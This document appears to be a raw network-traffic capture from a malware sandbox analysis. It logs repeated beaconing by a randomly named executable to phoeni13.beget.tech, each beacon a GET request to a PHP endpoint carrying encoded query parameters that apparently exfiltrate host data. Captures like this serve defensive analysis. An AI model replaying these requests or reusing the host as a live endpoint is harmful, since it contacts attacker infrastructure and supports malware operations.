Jan 5, 2025 18:59:51.155678988 CET	350	IN	HTTP/1.1 200 OK Server: nginx-reuseport/1.21.1 Date: Sun, 05 Jan 2025 17:59:50 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Keep-Alive: timeout=30 Vary: Accept-Encoding X-Powered-By: PHP/8.2.22 Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 4e 6b 6c 44 4d 7a 49 6d 4d 79 51 7a 4d 32 49 6d 5a 33 59 54 5a 34 55 47 4d 32 59 44 4e 33 55 54 4f 6d 5a 44 4e 34 55 44 4d 32 49 79 65 36 49 69 59 32 59 32 59 33 55 32 4e 6c 4a 32 59 30 49 47 4f 30 51 6d 5a 34 51 6a 4d 6c 42 44 4f 32 55 47 4e 33 59 44 4f 79 51 6a 4e 69 4a 79 65 Data Ascii: ==Qf9JiI6ICNklDMzImMyQzM2ImZ3YTZ4UGM2YDN3UTOmZDN4UDM2Iye6IiY2Y2Y3U2NlJ2Y0IGO0QmZ4QjMlBDO2UGN3YDOyQjNiJye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	50038	5.101.152.15	80	7744	C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 5, 2025 18:59:55.963972092 CET	2905	OUT	GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=QX9JiI6IyNjJjN3Q2NxUTY3YzM2UmYhJDNzIWYhNDO3YTNhRWZwICLiUmZxMmN4EjMkRGM3EmZwEzYwITY1UjNjNDMkBDZwUWMmlzNiJ2YiVmI6IiMmhDZ2gTN0AjYzYmNyQGO0YTZlFmY2UTN4ETYmNTZ4ICLiEmYlJ2YkZWMyEDM0U2YmhDO3gTYllTO1MzYmhjN1ATOyMTY1kDOjBjI6ICM2IjM2cTY1MWO1IjZ3ADO2U2N4IjZxkDM3YmN2Y2NjJyes0nI5EjbJpXUq9ENRp2T3VkaJZTSpplMjpnTwcGVahXV65UMNpmTq5EVPFTVtl1aKdVTwkFRPtGZE9EakRkWop0VZlmRXpVbSJTTpdXaJxWQ61UavpWS1EEVNJzaqlVeFRkWopleONTSU1UNRRVTwEF [TRUNCATED] Accept: / Content-Type: text/csv User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: phoeni13.beget.tech Connection: Keep-Alive
Jan 5, 2025 18:59:56.721702099 CET	350	IN	HTTP/1.1 200 OK Server: nginx-reuseport/1.21.1 Date: Sun, 05 Jan 2025 17:59:56 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Keep-Alive: timeout=30 Vary: Accept-Encoding X-Powered-By: PHP/8.2.22 Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 4e 6b 6c 44 4d 7a 49 6d 4d 79 51 7a 4d 32 49 6d 5a 33 59 54 5a 34 55 47 4d 32 59 44 4e 33 55 54 4f 6d 5a 44 4e 34 55 44 4d 32 49 79 65 36 49 69 59 32 59 32 59 33 55 32 4e 6c 4a 32 59 30 49 47 4f 30 51 6d 5a 34 51 6a 4d 6c 42 44 4f 32 55 47 4e 33 59 44 4f 79 51 6a 4e 69 4a 79 65 Data Ascii: ==Qf9JiI6ICNklDMzImMyQzM2ImZ3YTZ4UGM2YDN3UTOmZDN4UDM2Iye6IiY2Y2Y3U2NlJ2Y0IGO0QmZ4QjMlBDO2UGN3YDOyQjNiJye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	50039	5.101.152.15	80	7744	C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 5, 2025 19:00:01.758035898 CET	2881	OUT	GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=QX9JiI6IyNjJjN3Q2NxUTY3YzM2UmYhJDNzIWYhNDO3YTNhRWZwICLiUmZxMmN4EjMkRGM3EmZwEzYwITY1UjNjNDMkBDZwUWMmlzNiJ2YiVmI6IiMmhDZ2gTN0AjYzYmNyQGO0YTZlFmY2UTN4ETYmNTZ4ICLiEmYlJ2YkZWMyEDM0U2YmhDO3gTYllTO1MzYmhjN1ATOyMTY1kDOjBjI6ICM2IjM2cTY1MWO1IjZ3ADO2U2N4IjZxkDM3YmN2Y2NjJyes0nI5EjbJdXSq9ENJp2TzEkaJZTSpplMjpnTwcGVahXV65UMNpmTq5EVPFTVtl1aKdVTwkFRPtGZE9EakRkWop0VZlmRXpVbSJTTpdXaJxWQ61UavpWS1EEVNJzaqlVeFRkWopleONTSU1UNRRVTwEF [TRUNCATED] Accept: / Content-Type: text/csv User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: phoeni13.beget.tech
Jan 5, 2025 19:00:02.503570080 CET	350	IN	HTTP/1.1 200 OK Server: nginx-reuseport/1.21.1 Date: Sun, 05 Jan 2025 18:00:02 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Keep-Alive: timeout=30 Vary: Accept-Encoding X-Powered-By: PHP/8.2.22 Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 4e 6b 6c 44 4d 7a 49 6d 4d 79 51 7a 4d 32 49 6d 5a 33 59 54 5a 34 55 47 4d 32 59 44 4e 33 55 54 4f 6d 5a 44 4e 34 55 44 4d 32 49 79 65 36 49 69 59 32 59 32 59 33 55 32 4e 6c 4a 32 59 30 49 47 4f 30 51 6d 5a 34 51 6a 4d 6c 42 44 4f 32 55 47 4e 33 59 44 4f 79 51 6a 4e 69 4a 79 65 Data Ascii: ==Qf9JiI6ICNklDMzImMyQzM2ImZ3YTZ4UGM2YDN3UTOmZDN4UDM2Iye6IiY2Y2Y3U2NlJ2Y0IGO0QmZ4QjMlBDO2UGN3YDOyQjNiJye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	50040	5.101.152.15	80	7744	C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 5, 2025 19:00:07.525902987 CET	2881	OUT	GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=QX9JiI6IyNjJjN3Q2NxUTY3YzM2UmYhJDNzIWYhNDO3YTNhRWZwICLiUmZxMmN4EjMkRGM3EmZwEzYwITY1UjNjNDMkBDZwUWMmlzNiJ2YiVmI6IiMmhDZ2gTN0AjYzYmNyQGO0YTZlFmY2UTN4ETYmNTZ4ICLiEmYlJ2YkZWMyEDM0U2YmhDO3gTYllTO1MzYmhjN1ATOyMTY1kDOjBjI6ICM2IjM2cTY1MWO1IjZ3ADO2U2N4IjZxkDM3YmN2Y2NjJyes0nI5EjbJpXQq9UNRp2TxUkaJZTSpplMjpnTwcGVahXV65UMNpmTq5EVPFTVtl1aKdVTwkFRPtGZE9EakRkWop0VZlmRXpVbSJTTpdXaJxWQ61UavpWS1EEVNJzaqlVeFRkWopleONTSU1UNRRVTwEF [TRUNCATED] Accept: / Content-Type: text/csv User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: phoeni13.beget.tech
Jan 5, 2025 19:00:08.248733044 CET	350	IN	HTTP/1.1 200 OK Server: nginx-reuseport/1.21.1 Date: Sun, 05 Jan 2025 18:00:08 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Keep-Alive: timeout=30 Vary: Accept-Encoding X-Powered-By: PHP/8.2.22 Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 4e 6b 6c 44 4d 7a 49 6d 4d 79 51 7a 4d 32 49 6d 5a 33 59 54 5a 34 55 47 4d 32 59 44 4e 33 55 54 4f 6d 5a 44 4e 34 55 44 4d 32 49 79 65 36 49 69 59 32 59 32 59 33 55 32 4e 6c 4a 32 59 30 49 47 4f 30 51 6d 5a 34 51 6a 4d 6c 42 44 4f 32 55 47 4e 33 59 44 4f 79 51 6a 4e 69 4a 79 65 Data Ascii: ==Qf9JiI6ICNklDMzImMyQzM2ImZ3YTZ4UGM2YDN3UTOmZDN4UDM2Iye6IiY2Y2Y3U2NlJ2Y0IGO0QmZ4QjMlBDO2UGN3YDOyQjNiJye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	50041	5.101.152.15	80	7744	C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 5, 2025 19:00:13.289949894 CET	2881	OUT	GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=QX9JiI6IyNjJjN3Q2NxUTY3YzM2UmYhJDNzIWYhNDO3YTNhRWZwICLiUmZxMmN4EjMkRGM3EmZwEzYwITY1UjNjNDMkBDZwUWMmlzNiJ2YiVmI6IiMmhDZ2gTN0AjYzYmNyQGO0YTZlFmY2UTN4ETYmNTZ4ICLiEmYlJ2YkZWMyEDM0U2YmhDO3gTYllTO1MzYmhjN1ATOyMTY1kDOjBjI6ICM2IjM2cTY1MWO1IjZ3ADO2U2N4IjZxkDM3YmN2Y2NjJyes0nI5EjbJNTRq9kMFp2TwEkaJZTSpplMjpnTwcGVahXV65UMNpmTq5EVPFTVtl1aKdVTwkFRPtGZE9EakRkWop0VZlmRXpVbSJTTpdXaJxWQ61UavpWS1EEVNJzaqlVeFRkWopleONTSU1UNRRVTwEF [TRUNCATED] Accept: / Content-Type: text/csv User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: phoeni13.beget.tech
Jan 5, 2025 19:00:14.130461931 CET	350	IN	HTTP/1.1 200 OK Server: nginx-reuseport/1.21.1 Date: Sun, 05 Jan 2025 18:00:13 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Keep-Alive: timeout=30 Vary: Accept-Encoding X-Powered-By: PHP/8.2.22 Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 4e 6b 6c 44 4d 7a 49 6d 4d 79 51 7a 4d 32 49 6d 5a 33 59 54 5a 34 55 47 4d 32 59 44 4e 33 55 54 4f 6d 5a 44 4e 34 55 44 4d 32 49 79 65 36 49 69 59 32 59 32 59 33 55 32 4e 6c 4a 32 59 30 49 47 4f 30 51 6d 5a 34 51 6a 4d 6c 42 44 4f 32 55 47 4e 33 59 44 4f 79 51 6a 4e 69 4a 79 65 Data Ascii: ==Qf9JiI6ICNklDMzImMyQzM2ImZ3YTZ4UGM2YDN3UTOmZDN4UDM2Iye6IiY2Y2Y3U2NlJ2Y0IGO0QmZ4QjMlBDO2UGN3YDOyQjNiJye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	50042	5.101.152.15	80	7744	C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 5, 2025 19:00:19.150630951 CET	2905	OUT	GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=QX9JiI6IyNjJjN3Q2NxUTY3YzM2UmYhJDNzIWYhNDO3YTNhRWZwICLiUmZxMmN4EjMkRGM3EmZwEzYwITY1UjNjNDMkBDZwUWMmlzNiJ2YiVmI6IiMmhDZ2gTN0AjYzYmNyQGO0YTZlFmY2UTN4ETYmNTZ4ICLiEmYlJ2YkZWMyEDM0U2YmhDO3gTYllTO1MzYmhjN1ATOyMTY1kDOjBjI6ICM2IjM2cTY1MWO1IjZ3ADO2U2N4IjZxkDM3YmN2Y2NjJyes0nI5EjbJhXQq9keNp2T6FkaJZTSpplMjpnTwcGVahXV65UMNpmTq5EVPFTVtl1aKdVTwkFRPtGZE9EakRkWop0VZlmRXpVbSJTTpdXaJxWQ61UavpWS1EEVNJzaqlVeFRkWopleONTSU1UNRRVTwEF [TRUNCATED] Accept: / Content-Type: text/csv User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: phoeni13.beget.tech Connection: Keep-Alive
Jan 5, 2025 19:00:19.919224024 CET	350	IN	HTTP/1.1 200 OK Server: nginx-reuseport/1.21.1 Date: Sun, 05 Jan 2025 18:00:19 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Keep-Alive: timeout=30 Vary: Accept-Encoding X-Powered-By: PHP/8.2.22 Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 4e 6b 6c 44 4d 7a 49 6d 4d 79 51 7a 4d 32 49 6d 5a 33 59 54 5a 34 55 47 4d 32 59 44 4e 33 55 54 4f 6d 5a 44 4e 34 55 44 4d 32 49 79 65 36 49 69 59 32 59 32 59 33 55 32 4e 6c 4a 32 59 30 49 47 4f 30 51 6d 5a 34 51 6a 4d 6c 42 44 4f 32 55 47 4e 33 59 44 4f 79 51 6a 4e 69 4a 79 65 Data Ascii: ==Qf9JiI6ICNklDMzImMyQzM2ImZ3YTZ4UGM2YDN3UTOmZDN4UDM2Iye6IiY2Y2Y3U2NlJ2Y0IGO0QmZ4QjMlBDO2UGN3YDOyQjNiJye
Jan 5, 2025 19:00:20.133548021 CET	350	IN	HTTP/1.1 200 OK Server: nginx-reuseport/1.21.1 Date: Sun, 05 Jan 2025 18:00:19 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Keep-Alive: timeout=30 Vary: Accept-Encoding X-Powered-By: PHP/8.2.22 Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 4e 6b 6c 44 4d 7a 49 6d 4d 79 51 7a 4d 32 49 6d 5a 33 59 54 5a 34 55 47 4d 32 59 44 4e 33 55 54 4f 6d 5a 44 4e 34 55 44 4d 32 49 79 65 36 49 69 59 32 59 32 59 33 55 32 4e 6c 4a 32 59 30 49 47 4f 30 51 6d 5a 34 51 6a 4d 6c 42 44 4f 32 55 47 4e 33 59 44 4f 79 51 6a 4e 69 4a 79 65 Data Ascii: ==Qf9JiI6ICNklDMzImMyQzM2ImZ3YTZ4UGM2YDN3UTOmZDN4UDM2Iye6IiY2Y2Y3U2NlJ2Y0IGO0QmZ4QjMlBDO2UGN3YDOyQjNiJye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	50043	5.101.152.15	80	7744	C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 5, 2025 19:00:24.934535027 CET	2905	OUT	GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=QX9JiI6IyNjJjN3Q2NxUTY3YzM2UmYhJDNzIWYhNDO3YTNhRWZwICLiUmZxMmN4EjMkRGM3EmZwEzYwITY1UjNjNDMkBDZwUWMmlzNiJ2YiVmI6IiMmhDZ2gTN0AjYzYmNyQGO0YTZlFmY2UTN4ETYmNTZ4ICLiEmYlJ2YkZWMyEDM0U2YmhDO3gTYllTO1MzYmhjN1ATOyMTY1kDOjBjI6ICM2IjM2cTY1MWO1IjZ3ADO2U2N4IjZxkDM3YmN2Y2NjJyes0nI5EjbJpXUq9ENNp2T0EkaJZTSpplMjpnTwcGVahXV65UMNpmTq5EVPFTVtl1aKdVTwkFRPtGZE9EakRkWop0VZlmRXpVbSJTTpdXaJxWQ61UavpWS1EEVNJzaqlVeFRkWopleONTSU1UNRRVTwEF [TRUNCATED] Accept: / Content-Type: text/csv User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: phoeni13.beget.tech Connection: Keep-Alive
Jan 5, 2025 19:00:25.732461929 CET	350	IN	HTTP/1.1 200 OK Server: nginx-reuseport/1.21.1 Date: Sun, 05 Jan 2025 18:00:25 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Keep-Alive: timeout=30 Vary: Accept-Encoding X-Powered-By: PHP/8.2.22 Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 4e 6b 6c 44 4d 7a 49 6d 4d 79 51 7a 4d 32 49 6d 5a 33 59 54 5a 34 55 47 4d 32 59 44 4e 33 55 54 4f 6d 5a 44 4e 34 55 44 4d 32 49 79 65 36 49 69 59 32 59 32 59 33 55 32 4e 6c 4a 32 59 30 49 47 4f 30 51 6d 5a 34 51 6a 4d 6c 42 44 4f 32 55 47 4e 33 59 44 4f 79 51 6a 4e 69 4a 79 65 Data Ascii: ==Qf9JiI6ICNklDMzImMyQzM2ImZ3YTZ4UGM2YDN3UTOmZDN4UDM2Iye6IiY2Y2Y3U2NlJ2Y0IGO0QmZ4QjMlBDO2UGN3YDOyQjNiJye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	50044	5.101.152.15	80	7744	C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 5, 2025 19:00:30.806684017 CET	2905	OUT	GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=QX9JiI6IyNjJjN3Q2NxUTY3YzM2UmYhJDNzIWYhNDO3YTNhRWZwICLiUmZxMmN4EjMkRGM3EmZwEzYwITY1UjNjNDMkBDZwUWMmlzNiJ2YiVmI6IiMmhDZ2gTN0AjYzYmNyQGO0YTZlFmY2UTN4ETYmNTZ4ICLiEmYlJ2YkZWMyEDM0U2YmhDO3gTYllTO1MzYmhjN1ATOyMTY1kDOjBjI6ICM2IjM2cTY1MWO1IjZ3ADO2U2N4IjZxkDM3YmN2Y2NjJyes0nI5EjbJRTQq9UeJp2T6lkaJZTSpplMjpnTwcGVahXV65UMNpmTq5EVPFTVtl1aKdVTwkFRPtGZE9EakRkWop0VZlmRXpVbSJTTpdXaJxWQ61UavpWS1EEVNJzaqlVeFRkWopleONTSU1UNRRVTwEF [TRUNCATED] Accept: / Content-Type: text/csv User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: phoeni13.beget.tech Connection: Keep-Alive
Jan 5, 2025 19:00:31.553881884 CET	350	IN	HTTP/1.1 200 OK Server: nginx-reuseport/1.21.1 Date: Sun, 05 Jan 2025 18:00:31 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Keep-Alive: timeout=30 Vary: Accept-Encoding X-Powered-By: PHP/8.2.22 Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 4e 6b 6c 44 4d 7a 49 6d 4d 79 51 7a 4d 32 49 6d 5a 33 59 54 5a 34 55 47 4d 32 59 44 4e 33 55 54 4f 6d 5a 44 4e 34 55 44 4d 32 49 79 65 36 49 69 59 32 59 32 59 33 55 32 4e 6c 4a 32 59 30 49 47 4f 30 51 6d 5a 34 51 6a 4d 6c 42 44 4f 32 55 47 4e 33 59 44 4f 79 51 6a 4e 69 4a 79 65 Data Ascii: ==Qf9JiI6ICNklDMzImMyQzM2ImZ3YTZ4UGM2YDN3UTOmZDN4UDM2Iye6IiY2Y2Y3U2NlJ2Y0IGO0QmZ4QjMlBDO2UGN3YDOyQjNiJye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	50045	5.101.152.15	80	7744	C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 5, 2025 19:00:36.572999954 CET	2854	OUT	GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=0VfiIiOiczYyYzNkdTM1E2N2MjNlJWYyQzMiFWYzgzN2UTYkVGMiwiIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYisHL9JSOx4WSykkaPNTSq90MFpWS2kUaaJzY65EMnRlW4VleOFTTq5kaOR1TxUVbZtmSX1EMZR0TrRGRPhGZEpFaKdVWpZ0Va1mUy0Ua3lWSsFkeNl2bqlUNBRVTysmaZlXREpFaapnTzkEVNVTUU1EMRR [TRUNCATED] Accept: / Content-Type: text/csv User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: phoeni13.beget.tech
